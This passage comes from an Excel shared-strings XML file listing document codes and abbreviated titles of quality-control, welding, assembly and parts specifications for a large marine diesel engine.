    <t>4009464-6.0</t>
  </si>
  <si>
    <t>3070602-8.2</t>
  </si>
  <si>
    <t>5220837-8.0</t>
  </si>
  <si>
    <t>5193908-2.0</t>
  </si>
  <si>
    <t>5192019-7.0</t>
  </si>
  <si>
    <t>1381292-6.1</t>
  </si>
  <si>
    <t>5191828-0.2</t>
  </si>
  <si>
    <t>EN43HN83411500.0</t>
  </si>
  <si>
    <t>5665761-9.0</t>
  </si>
  <si>
    <t>5246188-8.0</t>
  </si>
  <si>
    <t>0741628-9.4</t>
  </si>
  <si>
    <t>EN8AR8.2.0</t>
  </si>
  <si>
    <t>0743664-6.24</t>
  </si>
  <si>
    <t>0743579-6.2</t>
  </si>
  <si>
    <t>1475207-5.2</t>
  </si>
  <si>
    <t>1142799-0.1</t>
  </si>
  <si>
    <t>0743023-6.3</t>
  </si>
  <si>
    <t>EN73R68.0</t>
  </si>
  <si>
    <t>5301809-2.0</t>
  </si>
  <si>
    <t>5242993-0.1</t>
  </si>
  <si>
    <t>5202616-4.4</t>
  </si>
  <si>
    <t>1881369-9.0</t>
  </si>
  <si>
    <t>1142038-2.0</t>
  </si>
  <si>
    <t>1310224-5.3</t>
  </si>
  <si>
    <t>3134227-4.3</t>
  </si>
  <si>
    <t>EN2E16140.0</t>
  </si>
  <si>
    <t>5276965-4.0</t>
  </si>
  <si>
    <t>1880576-6.0</t>
  </si>
  <si>
    <t>1380117-4.1</t>
  </si>
  <si>
    <t>1380385-6.1</t>
  </si>
  <si>
    <t>5171301-0.0</t>
  </si>
  <si>
    <t>1211869-4.0</t>
  </si>
  <si>
    <t>0743534-1.12</t>
  </si>
  <si>
    <t>0743755-7.0</t>
  </si>
  <si>
    <t>0743107-6.2</t>
  </si>
  <si>
    <t>5181977-2.0</t>
  </si>
  <si>
    <t>5189191-7.0</t>
  </si>
  <si>
    <t>EN3L48.0</t>
  </si>
  <si>
    <t>1764645-9.2</t>
  </si>
  <si>
    <t>5308835-6.1</t>
  </si>
  <si>
    <t>5308836-8.1</t>
  </si>
  <si>
    <t>5659774-5.0</t>
  </si>
  <si>
    <t>0743361-4.2</t>
  </si>
  <si>
    <t>3070161-7.0</t>
  </si>
  <si>
    <t>3070155-8.0</t>
  </si>
  <si>
    <t>5302702-9.0</t>
  </si>
  <si>
    <t>0789343-7.1</t>
  </si>
  <si>
    <t>5130830-6.0</t>
  </si>
  <si>
    <t>3091822-3.0</t>
  </si>
  <si>
    <t>EN2M1065.0</t>
  </si>
  <si>
    <t>5072420-9.0</t>
  </si>
  <si>
    <t>3172434-1.1</t>
  </si>
  <si>
    <t>1310243-6.2</t>
  </si>
  <si>
    <t>SPECIFICATION DOCUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALL ENGINE TYPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FORGED CROSSHEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING MATR.(ELECTRODES)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SA FOR EXHAUST RECIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT UP.GALLERY, EXH.S.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS.+MOUNT+ALIGN PISTONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGN+MOUNT CYL.FRAMES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CYL.COV.+EXH.PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING,TECH.REQUIREMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING METHOD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR OF EXH.V.SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS MAIN BEAR.CAP NODULAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC WHITEMETAL IN MAINBEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD.OF FUEL OIL H.P.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE INSTRUMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD.INSTR.FOR EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST SPINDLE HVOF-COAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CYL.COVER FIRST TIME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARKING OF ENGINE PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CAMSHAFT CHAINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FIRST TIME APPROV.GEN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC DEFECTREPAIR CASTSTEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH FRICTION COATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC BEARING ALUMIN. ALLOY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS CYL.COVER INCONEL 625</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING INSTR. CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC THERMAL SPRAY BOND. T.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS FOR CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS RELIEF VALVE CRANKCASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC TIGHTN.BOLTED JOINTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FORGED CYLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS HARDNESS MES.EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR SHRINKAGE BY WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS MAIN BEARING SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING DURING ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR FIT.BOLT DAMAGE ACCEPT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC EL. LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CHAIN WHEEL RUNNING IN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR PROTEC. ELECTRONIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR POST WELD TREATMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC AUXILIARY BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR CRANKSHAFT RECTIFYING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR BEARING HOYT CLORIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS WATER MIST CATCHER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSHAFT DEFLECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC HP FUEL OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS HEAT TREAT.WELDED COMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR DEBURRING + CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL CLEANLINESS SPEC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HP FUEL OIL PIPES, CONNEC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS PISTON RINGS, CERMET C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR PREP OF SPECIMEN, COAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING DEFORMATIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CASTING INSTRUCT. IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC TURNING GEAR, FIRST TI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHECK ALIGNMENT OF CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR GUIDANCE FOR INSPEC. O</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR MEASURING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CROWN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR WELDING OF STAINLESS S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECIP.PARTS OPERA.DESC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FATIGUE TESTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC LIFTING TOOL, FIRST TI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR BEARINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR PRESERVATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC SURFACE ROUGHNESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS CHAINS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR SHRINK FITTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAFETY REGULATION, DOCUME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS INSTALL ELECTRIC ITEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC, STEAM RESISTANT O RIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STORAGE OF SPARE PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS CYL. FRAME NODULAR CAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR CYLINDER FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS EXHAUST GAS RECYCLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPERVISION, FOREIGN LOD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC WELDING TRACEABILITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR MARKING OF PIPES COLOU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MANUFACTURING, HP OIL PIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR DEEP HOLE DRILLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING DEFECTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR/OR - ROTCOMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS, O-RING, PRODUCTION/ST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC HIGH PRESSURE SCR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR HARD CHROME PLATED HOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM DETAIL DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS NDT WELDED BEARING SHE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CHAIN+ADJ.CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT MANEOUVRING GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT THRUSTSHAFT+TURNWH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC TIGHTEN.MAIN BRG.STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT GUIDEWAYS, UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FUEL PLUNGER &amp; BARREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR HYDRAULIC HOSE &amp; PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUSHING,MAIN ENGINE, TES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS HYDR. PUMP, HAND OPERA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS FUEL VALVE TEST DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUSHING, ENGINE, SHIPYAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR BEDPL.SUPP.CHOCKS,MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUSHING, FUEL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REAMING BEDPLATE+FRAMEBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF MOMENT COMP.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT CRANK BEAR+CONN.ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR MOUNTING OF  TOP SECTI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR ALIGNING OF BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC BEAR.SUPP.FIRST TIME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE OFFSET BORING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING LEVEL, BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE, CIRCULAR PLAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PADEYES, SYMMETRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUTS FOR HYDR. TIGHTENING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING MAKERS (TIN-ALUMI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCESS (ACCOLAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCESS (DLH 2) D</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COATING PROCESS (SYNTHEC)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1872-0100 AXIAL VIBRATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, AXIAL VIBR. DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL PIPE-MAIN BEARIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 0-5</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTANCE PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CAM LOCK WASHERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PIPE FOR DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE FRAMEBOX COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX - MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS(30-39MM)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREADED UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP FLANGE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX, MISC. PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF VALVE - VARIANTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-0100 CRANKCASE RELIE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RELIEF VALVE - MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLASSIFICATION SPECIFICAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW, HEXAGON HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE ( 0 -( 50))OD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCKET SCREW.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON COOLING OIL, DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1072-1400 PISTON COOLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. PISTON COOLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON NUTS,SELF-LOCKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLLOW-P.SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL IRON, RHS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RAIL FOR SEALING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING MATERIAL, ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING MATERIAL-ROUND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER FRAME, MISC. PAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RINGS - NON GLUED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-RECTANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,RECTANGLE F PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPACER TUBULAR, STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLT, CHEESE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKET AND CYL. L</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. LUBR.SYSTEM, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CLEANING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING,OVAL EDGED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NON-RETURN VALVE ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAD, NON-RETURN VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL. SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QUICK COUPLING, MINIMESS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUAL TEE COUPL. COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT SCREW. CONN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD - FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL, CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTER FOR CHAIN WHEELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD AND CROSSH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING AND COOLING O</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CON.ROD ARR. WITHOUT SHIM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OILFLOW REGULATING PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD, BORING F.SHELLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDR.DOWELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SET SCREW W.DOG POINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE METAL GUIDE SHOE/GU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TELESCOPE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFF.BOX,TELESCOPIC PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SPECIAL HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON FLANGE SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD BEARINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0200 CROSSHEAD BEARI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING SHELL-CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEARING MAKERS (WHITE MET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTING ROD BEARINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2572-0300 CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.ROD BEARING-COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADDITIONAL MASS ON GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>1472-0320 CONROD ADDITION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SHOE, ADDITIONAL MA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDE RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPES W.CERTIFICATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUFFING BOX, PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0500 - PISTON ROD ST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring, extention</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING, PISTON ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEGMENT-SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>D-RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,OVAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDING BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING, COMPR. RIGHT-HAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON RING STEEL+C.IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>2272-0220 EXH. VALVE, DET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE-BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC PIPE, VALVE GEA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STEEL PIPE ( 50-(100))OD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE DIVIDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIGHT MALE STUD COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUST.ELBOW COUPL.COMPL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING,OVAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL VALVE FUNCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL NOZZLE, DRILLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK FOR THRUST PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER-FUEL NOZZLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-THRUST SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>3472-0200 STARTING AIR VA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
